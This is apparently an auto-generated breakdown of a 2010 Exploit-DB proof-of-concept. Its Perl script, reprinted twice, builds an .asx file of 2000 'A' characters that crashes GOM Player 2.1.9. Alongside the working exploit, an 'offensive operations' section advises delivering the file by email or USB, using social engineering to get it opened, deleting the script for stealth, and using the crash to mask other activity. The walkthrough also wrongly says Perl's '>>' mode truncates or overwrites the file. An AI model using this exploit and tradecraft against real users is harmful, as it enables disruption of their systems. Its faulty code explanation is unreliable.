GOM Player 2.1.9 Local Crash Exploit: A Didactic Breakdown

What this paper is

This paper is a Proof-of-Concept (PoC) exploit that demonstrates a local crash vulnerability in GOM Player version 2.1.9. It's a simple script designed to trigger a denial-of-service condition by crashing the application.

Simple technical breakdown

The exploit works by creating a specially crafted file that GOM Player attempts to open. This file contains an excessive amount of data, specifically a long string of 'A' characters. When GOM Player tries to process this oversized data, it likely overflows a buffer or encounters an unexpected condition, leading to a crash.

Complete code and payload walkthrough

The provided code is a Perl script. Let's break it down:

#!usr/bin/perl
#Exploits title :[GOM player V 2.1.9 Local crash poc]
#Date : [2010/01/02]
#Aouther : [SarBoT511]
#downloads :[http://en.kioskea.net/telecharger/download-2141-gom-player]
#tested on :[win xp sp2]
#GOM player V 2.1.9


$file="SarBoT511.asx";
$boom="A" x 2000;
open(myfile,">>$file");
print myfile $boom;
close(myfile);
print "Done ..! ~#";

#!usr/bin/perl: This is the shebang line, indicating that the script should be executed using the Perl interpreter.
#Exploits title :[GOM player V 2.1.9 Local crash poc]: A comment indicating the exploit's title.
#Date : [2010/01/02]: A comment indicating the date of creation.
#Aouther : [SarBoT511]: A comment indicating the author.
#downloads :[http://en.kioskea.net/telecharger/download-2141-gom-player]: A comment providing a download link for GOM Player.
#tested on :[win xp sp2]: A comment specifying the operating system and service pack it was tested on.
#GOM player V 2.1.9: A comment reiterating the vulnerable version.
$file="SarBoT511.asx";: This line declares a variable named $file and assigns it the string "SarBoT511.asx". This will be the name of the file created by the exploit. The .asx extension suggests it's intended to be an Advanced Systems Format file, often used for media playback.
$boom="A" x 2000;: This line declares a variable named $boom and assigns it a string consisting of the character 'A' repeated 2000 times. This is the "payload" or the data designed to cause the crash.
open(myfile,">>$file");: This line opens a file for writing.
- myfile: This is a filehandle that will be used to refer to the opened file.
- ">>$file": This is the mode string.
  - >: Opens the file for writing. If the file exists, its contents are truncated (erased).
  - >: Appends to the file if it exists. In this context, since it's the first open with this mode, it effectively creates the file if it doesn't exist or overwrites it if it does.
  - $file: The filename to open, which is "SarBoT511.asx".
print myfile $boom;: This line writes the content of the $boom variable (the 2000 'A's) into the file associated with the myfile filehandle.
close(myfile);: This line closes the myfile filehandle, ensuring that all data is flushed to the disk and the file is properly saved.
print "Done ..! ~#";: This line prints a confirmation message to the console indicating that the script has finished its execution.

Mapping list:

#!usr/bin/perl: Interpreter directive.
# Comments: Metadata and context.
$file="SarBoT511.asx";: Defines the output filename.
$boom="A" x 2000;: Defines the malicious payload (excessive data).
open(myfile,">>$file");: Opens/creates the target file for writing.
print myfile $boom;: Writes the payload into the file.
close(myfile);: Finalizes the file creation.
print "Done ..! ~#";: User feedback.

Practical details for offensive operations teams

Required Access Level: Local user access to the target machine is required to create and then have GOM Player open the malicious file.
Lab Preconditions:
- A Windows XP SP2 machine with GOM Player version 2.1.9 installed.
- A Perl interpreter installed on the target or a machine from which the script can be executed and the file transferred.
- The ability to transfer the generated .asx file to the target machine.
Tooling Assumptions:
- Perl interpreter (e.g., Strawberry Perl, ActivePerl).
- A text editor to create and save the Perl script.
- Standard Windows file system access.
Execution Pitfalls:
- Version Mismatch: The exploit is highly specific to GOM Player 2.1.9. Newer versions or even minor patches might have fixed this vulnerability.
- File Association/Opening Method: The exploit relies on the user or an automated process opening the SarBoT511.asx file with GOM Player. If the file is opened with a different application or not opened at all, the exploit will not trigger.
- Antivirus/EDR: While this is a simple file-based crash, modern security solutions might flag the creation of unusual files or the behavior of the Perl script itself.
- Payload Size: The exact size of the buffer overflow or problematic data structure is not specified. 2000 'A's might be insufficient or excessive for a different vulnerability within the same application. This PoC specifically targets a crash, not necessarily code execution.
- Privilege Escalation: This exploit is for a local crash, meaning it only affects the running instance of GOM Player for the logged-in user. It does not grant elevated privileges or remote code execution.
Tradecraft Considerations:
- Delivery: The .asx file needs to be delivered to the target. This could be via email attachment, shared drive, USB drive, or by tricking the user into downloading it.
- Execution Trigger: The user must be convinced to open the .asx file. Social engineering would be a key component.
- Stealth: The Perl script itself is a transient artifact. Once the .asx file is created, the script can be removed. The .asx file itself is just data, but its association with GOM Player is the trigger.
- Post-Exploitation (Crash): The primary outcome is GOM Player crashing. This can disrupt user activity, potentially mask other malicious activities, or be used as a form of denial-of-service.

Where this was used and when

Context: This exploit was published in 2010. It targets a specific, older version of GOM Player.
Usage: Exploits of this nature are typically used for:
- Vulnerability Research: Demonstrating flaws in software.
- Educational Purposes: Teaching about buffer overflows and denial-of-service vulnerabilities.
- Unauthorized Access (Historically): In the past, such vulnerabilities might have been used in targeted attacks to disrupt services or as a stepping stone for more complex attacks, though this specific PoC is limited to a local crash.
Approximate Years: Published in 2010, likely discovered shortly before. Vulnerabilities of this type were common in the late 2000s and early 2010s.

Defensive lessons for modern teams

Software Patching and Updates: The most crucial defense is to keep software, especially media players and common applications, updated to the latest stable versions. This PoC targets a known, old vulnerability.
Input Validation: Developers must rigorously validate all input, especially data from external sources or files. This includes checking for unexpected lengths, formats, and character sets.
Memory-Safe Languages and Practices: Using memory-safe programming languages or employing robust memory management techniques (like bounds checking) can prevent buffer overflow vulnerabilities.
Application Sandboxing: Running applications in sandboxed environments can limit the impact of a crash or exploit, preventing it from affecting the broader system.
File Type Handling: Security software can monitor or restrict the opening of potentially malicious file types, especially those associated with media playback that might be exploited.
Behavioral Analysis: Modern EDR solutions can detect anomalous application behavior, such as unexpected crashes or abnormal memory usage, even if the specific vulnerability is unknown.

ASCII visual (if applicable)

This exploit is a simple file creation and execution scenario, so a complex architecture diagram isn't strictly necessary. However, we can visualize the flow:

+-------------------+      +-------------------+      +-------------------+
|  Attacker's       |----->|  Target Machine   |----->|  GOM Player       |
|  Perl Script      |      |  (Win XP SP2)     |      |  (V 2.1.9)        |
+-------------------+      +-------------------+      +-------------------+
        |                      |
        | 1. Creates           | 3. Opens
        |    SarBoT511.asx     |    SarBoT511.asx
        |    (2000 'A's)       |
        v                      v
+-------------------+      +-------------------+
|  SarBoT511.asx    |----->|  Crash Occurs     |
|  (Malicious File) |      |  (Denial of       |
+-------------------+      |   Service)        |
                           +-------------------+

Explanation:

The attacker's Perl script runs on or is executed on the target machine.
The script creates a file named SarBoT511.asx containing 2000 'A' characters.
The user (or an automated process) opens this .asx file using GOM Player 2.1.9.
GOM Player attempts to process the file, encounters the excessive data, and crashes.

Source references

Paper ID: 10908
Paper Title: GOM player 2.1.9 - Local Crash (PoC)
Author: SarBoT511
Published: 2010-01-02
Keywords: Windows, dos
Paper URL: https://www.exploit-db.com/papers/10908
Raw URL: https://www.exploit-db.com/raw/10908

Original Exploit-DB Content (Verbatim)

#!usr/bin/perl
#Exploits title :[GOM player V 2.1.9 Local crash poc]
#Date : [2010/01/02]
#Aouther : [SarBoT511]
#downloads :[http://en.kioskea.net/telecharger/download-2141-gom-player]
#tested on :[win xp sp2]
#GOM player V 2.1.9


$file="SarBoT511.asx";
$boom="A" x 2000;
open(myfile,">>$file");
print myfile $boom;
close(myfile);
print "Done ..! ~#";

By exploitdb papers bot•January 2, 2010•

papers